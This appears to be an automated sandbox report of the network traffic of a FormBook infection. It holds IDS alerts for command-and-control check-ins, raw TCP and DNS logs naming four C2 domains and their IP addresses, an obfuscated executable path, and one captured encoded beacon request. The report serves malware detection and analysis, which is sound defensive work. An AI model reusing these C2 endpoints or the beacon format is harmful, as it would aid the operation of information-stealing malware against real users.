                           07/18/24-07:57:57.118083 | TCP | 2855465 | ETPRO TROJAN FormBook CnC Checkin (GET) M2 | 49726 | 80 | 192.168.2.6 | 185.179.189.181
                           07/18/24-07:58:26.022749 | TCP | 2855465 | ETPRO TROJAN FormBook CnC Checkin (GET) M2 | 49731 | 80 | 192.168.2.6 | 172.96.191.69
                           Timestamp | Protocol | SID | Signature | Source Port | Dest Port | Source IP | Dest IP
                           2024-07-18T07:58:49.249317+0200 | TCP | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 49737 | 80 | 192.168.2.6 | 162.159.134.42
                           2024-07-18T07:58:24.375289+0200 | TCP | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 49730 | 80 | 192.168.2.6 | 172.96.191.69
                           2024-07-18T07:58:35.096685+0200 | TCP | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 49733 | 80 | 192.168.2.6 | 13.248.169.48
                           2024-07-18T07:58:21.770675+0200 | TCP | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 49729 | 80 | 192.168.2.6 | 172.96.191.69
                           2024-07-18T07:58:26.978010+0200 | TCP | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 49731 | 80 | 192.168.2.6 | 172.96.191.69
                           2024-07-18T07:58:32.533421+0200 | TCP | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 49732 | 80 | 192.168.2.6 | 13.248.169.48
                           2024-07-18T07:58:40.282074+0200 | TCP | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 49735 | 80 | 192.168.2.6 | 13.248.169.48
                           2024-07-18T07:58:37.683924+0200 | TCP | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 49734 | 80 | 192.168.2.6 | 13.248.169.48
                           2024-07-18T07:57:57.804335+0200 | TCP | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 49726 | 80 | 192.168.2.6 | 185.179.189.181
                           2024-07-18T07:58:46.875735+0200 | TCP | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 49736 | 80 | 192.168.2.6 | 162.159.134.42
                           2024-07-18T07:58:26.978010+0200 | TCP | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 49731 | 80 | 192.168.2.6 | 172.96.191.69
                           2024-07-18T07:58:19.096164+0200 | TCP | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 49727 | 80 | 192.168.2.6 | 172.96.191.69
                           2024-07-18T07:58:40.282074+0200 | TCP | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 49735 | 80 | 192.168.2.6 | 13.248.169.48
                           2024-07-18T07:57:57.804335+0200 | TCP | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 49726 | 80 | 192.168.2.6 | 185.179.189.181
                           2024-07-18T07:58:51.685646+0200 | TCP | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 49738 | 80 | 192.168.2.6 | 162.159.134.42
                           Timestamp | Source Port | Dest Port | Source IP | Dest IP
                           Jul 18, 2024 07:57:57.090712070 CEST | 49726 | 80 | 192.168.2.6 | 185.179.189.181
                           Jul 18, 2024 07:57:57.096834898 CEST | 80 | 49726 | 185.179.189.181 | 192.168.2.6
                           Jul 18, 2024 07:57:57.096906900 CEST | 49726 | 80 | 192.168.2.6 | 185.179.189.181
                           Jul 18, 2024 07:57:57.118083000 CEST | 49726 | 80 | 192.168.2.6 | 185.179.189.181
                           Jul 18, 2024 07:57:57.123018026 CEST | 80 | 49726 | 185.179.189.181 | 192.168.2.6
                           Jul 18, 2024 07:57:57.804214001 CEST | 80 | 49726 | 185.179.189.181 | 192.168.2.6
                           Jul 18, 2024 07:57:57.804285049 CEST | 80 | 49726 | 185.179.189.181 | 192.168.2.6
                           Jul 18, 2024 07:57:57.804322958 CEST | 80 | 49726 | 185.179.189.181 | 192.168.2.6
                           Jul 18, 2024 07:57:57.804335117 CEST | 49726 | 80 | 192.168.2.6 | 185.179.189.181
                           Jul 18, 2024 07:57:57.805236101 CEST | 80 | 49726 | 185.179.189.181 | 192.168.2.6
                           Jul 18, 2024 07:57:57.805274010 CEST | 80 | 49726 | 185.179.189.181 | 192.168.2.6
                           Jul 18, 2024 07:57:57.805344105 CEST | 49726 | 80 | 192.168.2.6 | 185.179.189.181
                           Jul 18, 2024 07:57:57.806301117 CEST | 80 | 49726 | 185.179.189.181 | 192.168.2.6
                           Jul 18, 2024 07:57:57.806314945 CEST | 80 | 49726 | 185.179.189.181 | 192.168.2.6
                           Jul 18, 2024 07:57:57.806349993 CEST | 80 | 49726 | 185.179.189.181 | 192.168.2.6
                           Jul 18, 2024 07:57:57.806354046 CEST | 49726 | 80 | 192.168.2.6 | 185.179.189.181
                           Jul 18, 2024 07:57:57.806385994 CEST | 80 | 49726 | 185.179.189.181 | 192.168.2.6
                           Jul 18, 2024 07:57:57.806416035 CEST | 49726 | 80 | 192.168.2.6 | 185.179.189.181
                           Jul 18, 2024 07:57:57.806435108 CEST | 49726 | 80 | 192.168.2.6 | 185.179.189.181
                           Jul 18, 2024 07:57:57.823163986 CEST | 49726 | 80 | 192.168.2.6 | 185.179.189.181
                           Jul 18, 2024 07:57:57.828321934 CEST | 80 | 49726 | 185.179.189.181 | 192.168.2.6
                           Jul 18, 2024 07:58:18.177882910 CEST | 49727 | 80 | 192.168.2.6 | 172.96.191.69
                           Jul 18, 2024 07:58:18.182952881 CEST | 80 | 49727 | 172.96.191.69 | 192.168.2.6
                           Jul 18, 2024 07:58:18.183032036 CEST | 49727 | 80 | 192.168.2.6 | 172.96.191.69
                           Jul 18, 2024 07:58:18.202198982 CEST | 49727 | 80 | 192.168.2.6 | 172.96.191.69
                           Jul 18, 2024 07:58:18.207575083 CEST | 80 | 49727 | 172.96.191.69 | 192.168.2.6
                           Jul 18, 2024 07:58:19.095880032 CEST | 80 | 49727 | 172.96.191.69 | 192.168.2.6
                           Jul 18, 2024 07:58:19.096050024 CEST | 80 | 49727 | 172.96.191.69 | 192.168.2.6
                           Jul 18, 2024 07:58:19.096163988 CEST | 49727 | 80 | 192.168.2.6 | 172.96.191.69
                           Jul 18, 2024 07:58:19.718575001 CEST | 49727 | 80 | 192.168.2.6 | 172.96.191.69
                           Jul 18, 2024 07:58:20.755857944 CEST | 49729 | 80 | 192.168.2.6 | 172.96.191.69
                           Jul 18, 2024 07:58:20.826809883 CEST | 80 | 49729 | 172.96.191.69 | 192.168.2.6
                           Jul 18, 2024 07:58:20.826919079 CEST | 49729 | 80 | 192.168.2.6 | 172.96.191.69
                           Jul 18, 2024 07:58:20.857610941 CEST | 49729 | 80 | 192.168.2.6 | 172.96.191.69
                           Jul 18, 2024 07:58:20.862704039 CEST | 80 | 49729 | 172.96.191.69 | 192.168.2.6
                           Jul 18, 2024 07:58:21.769669056 CEST | 80 | 49729 | 172.96.191.69 | 192.168.2.6
                           Jul 18, 2024 07:58:21.770622015 CEST | 80 | 49729 | 172.96.191.69 | 192.168.2.6
                           Jul 18, 2024 07:58:21.770674944 CEST | 49729 | 80 | 192.168.2.6 | 172.96.191.69
                           Jul 18, 2024 07:58:22.374763966 CEST | 49729 | 80 | 192.168.2.6 | 172.96.191.69
                           Jul 18, 2024 07:58:23.412152052 CEST | 49730 | 80 | 192.168.2.6 | 172.96.191.69
                           Jul 18, 2024 07:58:23.420867920 CEST | 80 | 49730 | 172.96.191.69 | 192.168.2.6
                           Jul 18, 2024 07:58:23.424576998 CEST | 49730 | 80 | 192.168.2.6 | 172.96.191.69
                           Jul 18, 2024 07:58:23.449057102 CEST | 49730 | 80 | 192.168.2.6 | 172.96.191.69
                           Jul 18, 2024 07:58:23.453990936 CEST | 80 | 49730 | 172.96.191.69 | 192.168.2.6
                           Jul 18, 2024 07:58:23.454330921 CEST | 80 | 49730 | 172.96.191.69 | 192.168.2.6
                           Jul 18, 2024 07:58:24.374906063 CEST | 80 | 49730 | 172.96.191.69 | 192.168.2.6
                           Jul 18, 2024 07:58:24.375233889 CEST | 80 | 49730 | 172.96.191.69 | 192.168.2.6
                           Jul 18, 2024 07:58:24.375288963 CEST | 49730 | 80 | 192.168.2.6 | 172.96.191.69
                           Jul 18, 2024 07:58:24.952591896 CEST | 49730 | 80 | 192.168.2.6 | 172.96.191.69
                           Jul 18, 2024 07:58:25.995946884 CEST | 49731 | 80 | 192.168.2.6 | 172.96.191.69
                           Jul 18, 2024 07:58:26.001988888 CEST | 80 | 49731 | 172.96.191.69 | 192.168.2.6
                           Jul 18, 2024 07:58:26.002106905 CEST | 49731 | 80 | 192.168.2.6 | 172.96.191.69
                           Jul 18, 2024 07:58:26.022748947 CEST | 49731 | 80 | 192.168.2.6 | 172.96.191.69
                          Jul 18, 2024 07:58:26.027837038 CEST8049731172.96.191.69192.168.2.6
                          Jul 18, 2024 07:58:26.973881006 CEST8049731172.96.191.69192.168.2.6
                          Jul 18, 2024 07:58:26.974126101 CEST8049731172.96.191.69192.168.2.6
                          Jul 18, 2024 07:58:26.978009939 CEST4973180192.168.2.6172.96.191.69
                          Jul 18, 2024 07:58:26.983998060 CEST4973180192.168.2.6172.96.191.69
                          Jul 18, 2024 07:58:26.988910913 CEST8049731172.96.191.69192.168.2.6
                          Jul 18, 2024 07:58:32.055438995 CEST4973280192.168.2.613.248.169.48
                          Jul 18, 2024 07:58:32.060395002 CEST804973213.248.169.48192.168.2.6
                          Jul 18, 2024 07:58:32.060501099 CEST4973280192.168.2.613.248.169.48
                          Jul 18, 2024 07:58:32.085448027 CEST4973280192.168.2.613.248.169.48
                          Jul 18, 2024 07:58:32.090435982 CEST804973213.248.169.48192.168.2.6
                          Jul 18, 2024 07:58:32.533335924 CEST804973213.248.169.48192.168.2.6
                          Jul 18, 2024 07:58:32.533421040 CEST4973280192.168.2.613.248.169.48
                          Jul 18, 2024 07:58:33.593405962 CEST4973280192.168.2.613.248.169.48
                          Jul 18, 2024 07:58:33.598728895 CEST804973213.248.169.48192.168.2.6
                          Jul 18, 2024 07:58:34.631131887 CEST4973380192.168.2.613.248.169.48
                          Jul 18, 2024 07:58:34.636264086 CEST804973313.248.169.48192.168.2.6
                          Jul 18, 2024 07:58:34.636362076 CEST4973380192.168.2.613.248.169.48
                          Jul 18, 2024 07:58:34.660021067 CEST4973380192.168.2.613.248.169.48
                          Jul 18, 2024 07:58:34.665194988 CEST804973313.248.169.48192.168.2.6
                          Jul 18, 2024 07:58:35.095482111 CEST804973313.248.169.48192.168.2.6
                          Jul 18, 2024 07:58:35.096684933 CEST4973380192.168.2.613.248.169.48
                          Jul 18, 2024 07:58:36.171363115 CEST4973380192.168.2.613.248.169.48
                          Jul 18, 2024 07:58:36.176816940 CEST804973313.248.169.48192.168.2.6
                          Jul 18, 2024 07:58:37.208889961 CEST4973480192.168.2.613.248.169.48
                          Jul 18, 2024 07:58:37.218674898 CEST804973413.248.169.48192.168.2.6
                          Jul 18, 2024 07:58:37.218792915 CEST4973480192.168.2.613.248.169.48
                          Jul 18, 2024 07:58:37.243310928 CEST4973480192.168.2.613.248.169.48
                          Jul 18, 2024 07:58:37.249099970 CEST804973413.248.169.48192.168.2.6
                          Jul 18, 2024 07:58:37.249125957 CEST804973413.248.169.48192.168.2.6
                          Jul 18, 2024 07:58:37.683837891 CEST804973413.248.169.48192.168.2.6
                          Jul 18, 2024 07:58:37.683923960 CEST4973480192.168.2.613.248.169.48
                          Jul 18, 2024 07:58:38.749742985 CEST4973480192.168.2.613.248.169.48
                          Jul 18, 2024 07:58:38.754853010 CEST804973413.248.169.48192.168.2.6
                          Jul 18, 2024 07:58:39.789879084 CEST4973580192.168.2.613.248.169.48
                          Jul 18, 2024 07:58:39.795445919 CEST804973513.248.169.48192.168.2.6
                          Jul 18, 2024 07:58:39.798032045 CEST4973580192.168.2.613.248.169.48
                          Jul 18, 2024 07:58:39.821866989 CEST4973580192.168.2.613.248.169.48
                          Jul 18, 2024 07:58:39.826778889 CEST804973513.248.169.48192.168.2.6
                          Jul 18, 2024 07:58:40.281903028 CEST804973513.248.169.48192.168.2.6
                          Jul 18, 2024 07:58:40.281924963 CEST804973513.248.169.48192.168.2.6
                          Jul 18, 2024 07:58:40.282073975 CEST4973580192.168.2.613.248.169.48
                          Jul 18, 2024 07:58:40.292316914 CEST4973580192.168.2.613.248.169.48
                          Jul 18, 2024 07:58:40.297025919 CEST804973513.248.169.48192.168.2.6
                          Jul 18, 2024 07:58:45.341984034 CEST4973680192.168.2.6162.159.134.42
                          Jul 18, 2024 07:58:45.347134113 CEST8049736162.159.134.42192.168.2.6
                          Jul 18, 2024 07:58:45.347213030 CEST4973680192.168.2.6162.159.134.42
                          Jul 18, 2024 07:58:45.371663094 CEST4973680192.168.2.6162.159.134.42
                          Jul 18, 2024 07:58:45.382904053 CEST8049736162.159.134.42192.168.2.6
                          Jul 18, 2024 07:58:46.875735044 CEST4973680192.168.2.6162.159.134.42
                          Jul 18, 2024 07:58:46.881392002 CEST8049736162.159.134.42192.168.2.6
                          Jul 18, 2024 07:58:46.881505966 CEST4973680192.168.2.6162.159.134.42
                          Jul 18, 2024 07:58:47.911711931 CEST4973780192.168.2.6162.159.134.42
                          Jul 18, 2024 07:58:47.916728973 CEST8049737162.159.134.42192.168.2.6
                          Jul 18, 2024 07:58:47.916817904 CEST4973780192.168.2.6162.159.134.42
                          Jul 18, 2024 07:58:47.945039034 CEST4973780192.168.2.6162.159.134.42
                          Jul 18, 2024 07:58:47.949876070 CEST8049737162.159.134.42192.168.2.6
                          Jul 18, 2024 07:58:49.249067068 CEST8049737162.159.134.42192.168.2.6
                          Jul 18, 2024 07:58:49.249186993 CEST8049737162.159.134.42192.168.2.6
                          Jul 18, 2024 07:58:49.249200106 CEST8049737162.159.134.42192.168.2.6
                          Jul 18, 2024 07:58:49.249316931 CEST4973780192.168.2.6162.159.134.42
                          Jul 18, 2024 07:58:49.250176907 CEST8049737162.159.134.42192.168.2.6
                          Jul 18, 2024 07:58:49.250190973 CEST8049737162.159.134.42192.168.2.6
                          Jul 18, 2024 07:58:49.250246048 CEST4973780192.168.2.6162.159.134.42
                          Jul 18, 2024 07:58:49.250957012 CEST8049737162.159.134.42192.168.2.6
                          Jul 18, 2024 07:58:49.250972033 CEST8049737162.159.134.42192.168.2.6
                          Jul 18, 2024 07:58:49.251013994 CEST4973780192.168.2.6162.159.134.42
                          Jul 18, 2024 07:58:49.252002954 CEST8049737162.159.134.42192.168.2.6
                          Jul 18, 2024 07:58:49.252017975 CEST8049737162.159.134.42192.168.2.6
                          Jul 18, 2024 07:58:49.252072096 CEST4973780192.168.2.6162.159.134.42
                          Jul 18, 2024 07:58:49.252736092 CEST8049737162.159.134.42192.168.2.6
                          Jul 18, 2024 07:58:49.252787113 CEST4973780192.168.2.6162.159.134.42
                          Jul 18, 2024 07:58:49.257628918 CEST8049737162.159.134.42192.168.2.6
                          Jul 18, 2024 07:58:49.257930040 CEST8049737162.159.134.42192.168.2.6
                          Jul 18, 2024 07:58:49.261917114 CEST4973780192.168.2.6162.159.134.42
                          Jul 18, 2024 07:58:49.323869944 CEST8049737162.159.134.42192.168.2.6
                          Jul 18, 2024 07:58:49.324078083 CEST8049737162.159.134.42192.168.2.6
                          Jul 18, 2024 07:58:49.324090004 CEST8049737162.159.134.42192.168.2.6
                          Jul 18, 2024 07:58:49.324131012 CEST4973780192.168.2.6162.159.134.42
                          Jul 18, 2024 07:58:49.324981928 CEST8049737162.159.134.42192.168.2.6
                          Jul 18, 2024 07:58:49.324994087 CEST8049737162.159.134.42192.168.2.6
                          Jul 18, 2024 07:58:49.325043917 CEST4973780192.168.2.6162.159.134.42
                          Jul 18, 2024 07:58:49.325722933 CEST8049737162.159.134.42192.168.2.6
                          Jul 18, 2024 07:58:49.325735092 CEST8049737162.159.134.42192.168.2.6
                          Jul 18, 2024 07:58:49.325776100 CEST4973780192.168.2.6162.159.134.42
                          Jul 18, 2024 07:58:49.326632977 CEST8049737162.159.134.42192.168.2.6
                          Jul 18, 2024 07:58:49.326647043 CEST8049737162.159.134.42192.168.2.6
                          Jul 18, 2024 07:58:49.326694965 CEST4973780192.168.2.6162.159.134.42
                          Jul 18, 2024 07:58:49.327544928 CEST8049737162.159.134.42192.168.2.6
                          Jul 18, 2024 07:58:49.327558994 CEST8049737162.159.134.42192.168.2.6
                          Jul 18, 2024 07:58:49.327610016 CEST4973780192.168.2.6162.159.134.42
                          Jul 18, 2024 07:58:49.328470945 CEST8049737162.159.134.42192.168.2.6
                          Jul 18, 2024 07:58:49.328490973 CEST8049737162.159.134.42192.168.2.6
                          Jul 18, 2024 07:58:49.328542948 CEST4973780192.168.2.6162.159.134.42
                          Jul 18, 2024 07:58:49.329376936 CEST8049737162.159.134.42192.168.2.6
                          Jul 18, 2024 07:58:49.329391003 CEST8049737162.159.134.42192.168.2.6
                          Jul 18, 2024 07:58:49.329401970 CEST8049737162.159.134.42192.168.2.6
                          Jul 18, 2024 07:58:49.329442024 CEST4973780192.168.2.6162.159.134.42
                          Jul 18, 2024 07:58:49.329477072 CEST4973780192.168.2.6162.159.134.42
                          Jul 18, 2024 07:58:49.330296040 CEST8049737162.159.134.42192.168.2.6
                          Jul 18, 2024 07:58:49.330307961 CEST8049737162.159.134.42192.168.2.6
                          Jul 18, 2024 07:58:49.330604076 CEST4973780192.168.2.6162.159.134.42
                          Jul 18, 2024 07:58:49.331221104 CEST8049737162.159.134.42192.168.2.6
                          Jul 18, 2024 07:58:49.331234932 CEST8049737162.159.134.42192.168.2.6
                          Jul 18, 2024 07:58:49.331301928 CEST4973780192.168.2.6162.159.134.42
                          Jul 18, 2024 07:58:49.331892967 CEST8049737162.159.134.42192.168.2.6
                          Jul 18, 2024 07:58:49.331906080 CEST8049737162.159.134.42192.168.2.6
                          Jul 18, 2024 07:58:49.331957102 CEST4973780192.168.2.6162.159.134.42
                          Jul 18, 2024 07:58:49.410479069 CEST8049737162.159.134.42192.168.2.6
                          Jul 18, 2024 07:58:49.410705090 CEST8049737162.159.134.42192.168.2.6
                          Jul 18, 2024 07:58:49.410718918 CEST8049737162.159.134.42192.168.2.6
                          Jul 18, 2024 07:58:49.410770893 CEST4973780192.168.2.6162.159.134.42
                          Jul 18, 2024 07:58:49.411499023 CEST8049737162.159.134.42192.168.2.6
                          Jul 18, 2024 07:58:49.411604881 CEST4973780192.168.2.6162.159.134.42
                          Jul 18, 2024 07:58:49.411715031 CEST8049737162.159.134.42192.168.2.6
                          Jul 18, 2024 07:58:49.411766052 CEST4973780192.168.2.6162.159.134.42
                          Jul 18, 2024 07:58:49.452770948 CEST4973780192.168.2.6162.159.134.42
                          Jul 18, 2024 07:58:50.495199919 CEST4973880192.168.2.6162.159.134.42
                          Jul 18, 2024 07:58:50.500272036 CEST8049738162.159.134.42192.168.2.6
                          Jul 18, 2024 07:58:50.500379086 CEST4973880192.168.2.6162.159.134.42
                          Jul 18, 2024 07:58:50.530704975 CEST4973880192.168.2.6162.159.134.42
                          Jul 18, 2024 07:58:50.535691023 CEST8049738162.159.134.42192.168.2.6
                          Jul 18, 2024 07:58:50.536400080 CEST8049738162.159.134.42192.168.2.6
                          Jul 18, 2024 07:58:51.685472965 CEST8049738162.159.134.42192.168.2.6
                          Jul 18, 2024 07:58:51.685550928 CEST8049738162.159.134.42192.168.2.6
                          Jul 18, 2024 07:58:51.685564995 CEST8049738162.159.134.42192.168.2.6
                          Jul 18, 2024 07:58:51.685646057 CEST4973880192.168.2.6162.159.134.42
                          Jul 18, 2024 07:58:51.686371088 CEST8049738162.159.134.42192.168.2.6
                          Jul 18, 2024 07:58:51.686383963 CEST8049738162.159.134.42192.168.2.6
                          Jul 18, 2024 07:58:51.686429977 CEST4973880192.168.2.6162.159.134.42
                          Jul 18, 2024 07:58:51.687326908 CEST8049738162.159.134.42192.168.2.6
                          Jul 18, 2024 07:58:51.687342882 CEST8049738162.159.134.42192.168.2.6
                          Jul 18, 2024 07:58:51.687448025 CEST4973880192.168.2.6162.159.134.42
                          Jul 18, 2024 07:58:51.688256025 CEST8049738162.159.134.42192.168.2.6
                          Jul 18, 2024 07:58:51.688271046 CEST8049738162.159.134.42192.168.2.6
                          Jul 18, 2024 07:58:51.688345909 CEST4973880192.168.2.6162.159.134.42
                          Jul 18, 2024 07:58:51.689065933 CEST8049738162.159.134.42192.168.2.6
                          Jul 18, 2024 07:58:51.689390898 CEST4973880192.168.2.6162.159.134.42
                          Jul 18, 2024 07:58:51.690507889 CEST8049738162.159.134.42192.168.2.6
                          Jul 18, 2024 07:58:51.690651894 CEST8049738162.159.134.42192.168.2.6
                          Jul 18, 2024 07:58:51.692540884 CEST4973880192.168.2.6162.159.134.42
                          Jul 18, 2024 07:58:51.773096085 CEST8049738162.159.134.42192.168.2.6
                          Jul 18, 2024 07:58:51.773308992 CEST8049738162.159.134.42192.168.2.6
                          Jul 18, 2024 07:58:51.773323059 CEST8049738162.159.134.42192.168.2.6
                          Jul 18, 2024 07:58:51.773377895 CEST4973880192.168.2.6162.159.134.42
                          Jul 18, 2024 07:58:51.774104118 CEST8049738162.159.134.42192.168.2.6
                          Jul 18, 2024 07:58:51.774117947 CEST8049738162.159.134.42192.168.2.6
                          Jul 18, 2024 07:58:51.774203062 CEST4973880192.168.2.6162.159.134.42
                          Jul 18, 2024 07:58:51.774821043 CEST8049738162.159.134.42192.168.2.6
                          Jul 18, 2024 07:58:51.774833918 CEST8049738162.159.134.42192.168.2.6
                          Jul 18, 2024 07:58:51.774945021 CEST4973880192.168.2.6162.159.134.42
                          Jul 18, 2024 07:58:51.775758982 CEST8049738162.159.134.42192.168.2.6
                          Jul 18, 2024 07:58:51.775774956 CEST8049738162.159.134.42192.168.2.6
                          Jul 18, 2024 07:58:51.775839090 CEST4973880192.168.2.6162.159.134.42
                          Jul 18, 2024 07:58:51.776659012 CEST8049738162.159.134.42192.168.2.6
                          Jul 18, 2024 07:58:51.776674986 CEST8049738162.159.134.42192.168.2.6
                          Jul 18, 2024 07:58:51.776755095 CEST4973880192.168.2.6162.159.134.42
                          Jul 18, 2024 07:58:51.777667046 CEST8049738162.159.134.42192.168.2.6
                          Jul 18, 2024 07:58:51.777682066 CEST8049738162.159.134.42192.168.2.6
                          Jul 18, 2024 07:58:51.777791977 CEST4973880192.168.2.6162.159.134.42
                          Jul 18, 2024 07:58:51.778501034 CEST8049738162.159.134.42192.168.2.6
                          Jul 18, 2024 07:58:51.778516054 CEST8049738162.159.134.42192.168.2.6
                          Jul 18, 2024 07:58:51.778527021 CEST8049738162.159.134.42192.168.2.6
                          Jul 18, 2024 07:58:51.778594971 CEST4973880192.168.2.6162.159.134.42
                          Jul 18, 2024 07:58:51.778594971 CEST4973880192.168.2.6162.159.134.42
                          Jul 18, 2024 07:58:51.779432058 CEST8049738162.159.134.42192.168.2.6
                          Jul 18, 2024 07:58:51.779447079 CEST8049738162.159.134.42192.168.2.6
                          Jul 18, 2024 07:58:51.779934883 CEST4973880192.168.2.6162.159.134.42
                          Jul 18, 2024 07:58:51.780344009 CEST8049738162.159.134.42192.168.2.6
                          Jul 18, 2024 07:58:51.780356884 CEST8049738162.159.134.42192.168.2.6
                          Jul 18, 2024 07:58:51.780371904 CEST8049738162.159.134.42192.168.2.6
                          Jul 18, 2024 07:58:51.780435085 CEST4973880192.168.2.6162.159.134.42
                          Jul 18, 2024 07:58:51.817161083 CEST8049738162.159.134.42192.168.2.6
                          Jul 18, 2024 07:58:51.817253113 CEST4973880192.168.2.6162.159.134.42
                          Jul 18, 2024 07:58:51.817328930 CEST8049738162.159.134.42192.168.2.6
                          Jul 18, 2024 07:58:51.817342043 CEST8049738162.159.134.42192.168.2.6
                          Jul 18, 2024 07:58:51.817414045 CEST4973880192.168.2.6162.159.134.42
                          Jul 18, 2024 07:58:51.860584974 CEST8049738162.159.134.42192.168.2.6
                          Jul 18, 2024 07:58:51.860773087 CEST8049738162.159.134.42192.168.2.6
                          Jul 18, 2024 07:58:51.860785007 CEST8049738162.159.134.42192.168.2.6
                          Jul 18, 2024 07:58:51.861181021 CEST8049738162.159.134.42192.168.2.6
                          Jul 18, 2024 07:58:51.861211061 CEST4973880192.168.2.6162.159.134.42
                          Jul 18, 2024 07:58:51.861259937 CEST8049738162.159.134.42192.168.2.6
                          Jul 18, 2024 07:58:51.861408949 CEST4973880192.168.2.6162.159.134.42
                          Jul 18, 2024 07:58:52.984461069 CEST4973880192.168.2.6162.159.134.42
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Jul 18, 2024 07:57:56.985517025 CEST | 63026 | 53 | 192.168.2.6 | 1.1.1.1
Jul 18, 2024 07:57:57.078061104 CEST | 53 | 63026 | 1.1.1.1 | 192.168.2.6
Jul 18, 2024 07:58:17.901588917 CEST | 51476 | 53 | 192.168.2.6 | 1.1.1.1
Jul 18, 2024 07:58:18.168797016 CEST | 53 | 51476 | 1.1.1.1 | 192.168.2.6
Jul 18, 2024 07:58:32.026201010 CEST | 51993 | 53 | 192.168.2.6 | 1.1.1.1
Jul 18, 2024 07:58:32.044218063 CEST | 53 | 51993 | 1.1.1.1 | 192.168.2.6
Jul 18, 2024 07:58:45.320662975 CEST | 58753 | 53 | 192.168.2.6 | 1.1.1.1
Jul 18, 2024 07:58:45.332350016 CEST | 53 | 58753 | 1.1.1.1 | 192.168.2.6
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Jul 18, 2024 07:57:56.985517025 CEST | 192.168.2.6 | 1.1.1.1 | 0x71c4 | Standard query (0) | www.scottifqqy.online | A (IP address) | IN (0x0001) | false
Jul 18, 2024 07:58:17.901588917 CEST | 192.168.2.6 | 1.1.1.1 | 0x9b11 | Standard query (0) | www.ancuapengiu28.com | A (IP address) | IN (0x0001) | false
Jul 18, 2024 07:58:32.026201010 CEST | 192.168.2.6 | 1.1.1.1 | 0xfa30 | Standard query (0) | www.techacademy.store | A (IP address) | IN (0x0001) | false
Jul 18, 2024 07:58:45.320662975 CEST | 192.168.2.6 | 1.1.1.1 | 0xaf69 | Standard query (0) | www.goodneighbor.club | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Jul 18, 2024 07:57:57.078061104 CEST | 1.1.1.1 | 192.168.2.6 | 0x71c4 | No error (0) | www.scottifqqy.online | | 185.179.189.181 | A (IP address) | IN (0x0001) | false
Jul 18, 2024 07:58:18.168797016 CEST | 1.1.1.1 | 192.168.2.6 | 0x9b11 | No error (0) | www.ancuapengiu28.com | ancuapengiu28.com | | CNAME (Canonical name) | IN (0x0001) | false
Jul 18, 2024 07:58:18.168797016 CEST | 1.1.1.1 | 192.168.2.6 | 0x9b11 | No error (0) | ancuapengiu28.com | | 172.96.191.69 | A (IP address) | IN (0x0001) | false
Jul 18, 2024 07:58:32.044218063 CEST | 1.1.1.1 | 192.168.2.6 | 0xfa30 | No error (0) | www.techacademy.store | | 13.248.169.48 | A (IP address) | IN (0x0001) | false
Jul 18, 2024 07:58:32.044218063 CEST | 1.1.1.1 | 192.168.2.6 | 0xfa30 | No error (0) | www.techacademy.store | | 76.223.54.146 | A (IP address) | IN (0x0001) | false
Jul 18, 2024 07:58:45.332350016 CEST | 1.1.1.1 | 192.168.2.6 | 0xaf69 | No error (0) | www.goodneighbor.club | goodneighbor.club | | CNAME (Canonical name) | IN (0x0001) | false
Jul 18, 2024 07:58:45.332350016 CEST | 1.1.1.1 | 192.168.2.6 | 0xaf69 | No error (0) | goodneighbor.club | | 162.159.134.42 | A (IP address) | IN (0x0001) | false
                          • www.scottifqqy.online
                          • www.ancuapengiu28.com
                          • www.techacademy.store
                          • www.goodneighbor.club
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.6 | 49726 | 185.179.189.181 | 80 | 5956 | C:\Program Files (x86)\McEirohKWUkqujMrtjMiNZKWqtdmjbsDRNUXeiFWQcvHRUhtEkxQVAZGksndZFPlESH\YIJBuAgnqfKMtZ.exe
Timestamp | Bytes transferred | Direction | Data
Jul 18, 2024 07:57:57.118083000 CEST | 432 | OUT | GET /midu/?hR1p0=vfrlb&zRU=9nR4RRbtczDLM92wROaICO8mWeENBuMayS9RmkCU7FdLWzi6Zh5WY9LbBJga/o2cXaf6PRrIolXtwoFpXTr9SyPSPVCys8awhBwFZAVidM2Yj+9OFlKtZImodfdv2xp/fybq7VQ= HTTP/1.1
                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                          Accept-Language: en-US,en
                          Host: www.scottifqqy.online
                          Connection: close
                          User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0
Jul 18, 2024 07:57:57.804214001 CEST | 1236 | IN | HTTP/1.1 200 OK
                          Server: nginx
                          Date: Thu, 18 Jul 2024 05:57:57 GMT
                          Content-Type: text/html; charset=utf-8
                          Content-Length: 7742
                          Connection: close
                          Cache-Control: no-cache, no-store, must-revalidate
                          Expires: Thu, 18 Jul 2024 05:57:57 GMT
                          Set-Cookie: _subid=1eic6uc8re5; expires=Sun, 18 Aug 2024 05:57:57 GMT; path=/
